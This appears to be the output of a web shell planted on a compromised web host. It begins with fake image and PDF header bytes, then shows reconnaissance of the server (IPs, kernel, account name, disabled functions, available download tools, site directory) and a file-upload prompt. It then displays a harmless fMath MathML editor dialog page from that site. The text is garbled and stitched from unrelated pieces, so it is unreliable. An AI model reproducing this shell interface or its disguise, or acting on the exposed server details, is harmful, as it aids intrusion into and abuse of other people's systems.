ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/blogs/fileman1/dialogs/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="author" content="Ionel Alexandru"> <meta name="reply-to" content="ionel.alexandru@gmail.com"> <title>fMath Editor - www.fmath.info</title> </head> <body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"> <table width="860" height="460"> <tr height="100%"> <td align="center"> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="850" height="460" id="editML" name="editML" align="middle"> <param name=wmode value="transparent"> <param name="allowScriptAccess" value="always"/> <param name="allowFullScreen" value="true"/> <param name="loop" value="false"/> <param name="quality" value="high" /> <param name="flashVars" value="configUrl=configMathMLEditor.xml&loadOnInit=true"/> <param name="movie" value="mathml/MathMLEditor.swf?configUrl=configMathMLEditor.xml&loadOnInit=true" /> <embed src="mathml/MathMLEditor.swf?configUrl=configMathMLEditor.xml&loadOnInit=true" wmode="transparent" flashVars="configUrl=configMathMLEditor.xml&loadOnInit=true" loop="false" quality="high" width="850" height="460" id="editML" name="editML" align="middle" swliveconnect="true" allowScriptAccess="always" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer" /> </object> </td> </tr> </table> <script> function getMathMLFromJavascript(name){ var mathml = parent.CKEDITOR.plugins.get('fmath_formula').getCurrentMathML(); if(mathml==null){ mathml = "<mrow><mtext>...</mtext></mrow>"; } document.getElementById('editML').focus(); return mathml; } function setMathMLToEditor(mathml){ getSWF("editML").setMathML(mathml); } function getMathMLFromEditor(){ return getSWF("editML").getMathML(); } var ed; var name; var saved = false; function saveImage(editor){ if(saved) return; saved=true; ed = editor; getSWF("editML").saveImageOnServer(); } function setFileNameFromServer(n){ name = trim(n); setTimeout('saveAndUpdate()', 10); } function saveAndUpdate(){ var mathml = getMathMLFromEditor(); var newId = parent.CKEDITOR.plugins.get('fmath_formula').addMathML(mathml); ed.insertHtml("<img src='"+name+"' border='0' id='"+newId+"'/>"); var dialog = parent.CKEDITOR.dialog.getCurrent(); dialog.hide(); } function getSWF(movieName) { if (navigator.appName.indexOf("Microsoft") != -1) { return document.getElementById(movieName); }else { if (document.embeds && document.embeds[movieName]){ return document.embeds[movieName]; } if(document[movieName].length != undefined){ return document[movieName][1]; } return document[movieName]; } } function trim(str, chars) { return ltrim(rtrim(str, chars), chars); } function ltrim(str, chars) { chars = chars || "\\s"; return str.replace(new RegExp("^[" + chars + "]+", "g"), ""); } function rtrim(str, chars) { chars = chars || "\\s"; return str.replace(new RegExp("[" + chars + "]+$", "g"), ""); } </script> </body> </html>